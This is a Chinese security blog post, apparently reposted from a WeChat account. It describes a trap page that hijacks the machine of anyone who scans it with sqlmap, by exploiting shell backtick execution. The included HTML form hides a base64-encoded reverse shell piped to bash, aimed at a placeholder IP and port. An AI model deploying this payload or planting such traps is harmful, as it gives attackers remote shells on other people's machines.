可恶!没想到sqlmap也背叛了脚本小子

admin 2023年12月26日14:23:42评论28 views字数 1188阅读3分57秒阅读模式

免责声明:

本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承担。请遵守中华人民共和国相关法律法规,切勿利用本公众号发布的技术或工具从事违法犯罪活动。最后,文中提及的图文若无意间导致了侵权问题,请在公众号后台私信联系作者,进行删除操作。



0x01 序

之前有群友丢了一个案例,提问sqlmap是否有反制漏洞,群里有大哥回复有命令执行,由于自己对这个没有了解,但sqlmap嘛又是本脚本小子的常用工具,sql注入没有sqlmap怎么测嘛,那么处于对自己的保护赶紧随着大佬的提醒去看了看文章。

可恶!没想到sqlmap也背叛了脚本小子

0x02 过程

找了一些之前的文章,发现大概是21年的时候有人提到过的反制方案

构造特殊的get或者post注入点来等待攻击者使用sqlmap扫描,例如下图,将get请求中的一个参数的值设置为`ls`l,倘若直接改成反弹shell的代码即可反控对方机器。   可恶!没想到sqlmap也背叛了脚本小子

看似是利用了反引号导致执行了系统命令,sqlmap躺枪啊

介绍下shell规则中单引号、双引号、反引号、无引号的区别

单引号:单引号被识别为普通字符串,就是不识别引号里面的特殊字符,属于强引用。

可恶!没想到sqlmap也背叛了脚本小子

双引号:双引号里面的特殊字符是可以被识别的,是弱引用。    

可恶!没想到sqlmap也背叛了脚本小子

反引号:在linux中,反引号中的内容一般是一行或多行命令,当这些命令被反引号引着,命令执行结果就会以字符串的形式被保留下来。

可恶!没想到sqlmap也背叛了脚本小子

无引号:如何是连续的符号可以不加引号,但是如果有空格就有歧义,最好使用双引号。    

于是我们可以构造一个页面,把我们需要传递的参数传入,如果攻击者没仔细看数据包就丢进sqlmap尝试注入的话就有可能导致被反制

post方式的利用:

页面代码:

<html><head><meta charset="utf-8"><title> test demo</title></head><body><input>search the user</input> <form action="test.html" method="post" enctype="text/plain"><input type='hidden' name='name' value="A20&id=131241241&query=shell`echo YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvNzc3NyAwPiYx| base64 -d|bash -i`&port=6379"/><input type="submit" value='提交'></form></body></html>

Burp抓包查看    

     可恶!没想到sqlmap也背叛了脚本小子

查看效果

   可恶!没想到sqlmap也背叛了脚本小子

可恶!没想到sqlmap也背叛了脚本小子

那么防护方案的话就是,擦亮眼睛啊!  

可恶!没想到sqlmap也背叛了脚本小子



原文始发于微信公众号(哈拉少安全小队):可恶!没想到sqlmap也背叛了脚本小子

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月26日14:23:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   可恶!没想到sqlmap也背叛了脚本小子https://cn-sec.com/archives/2228007.html

发表评论

匿名网友 填写信息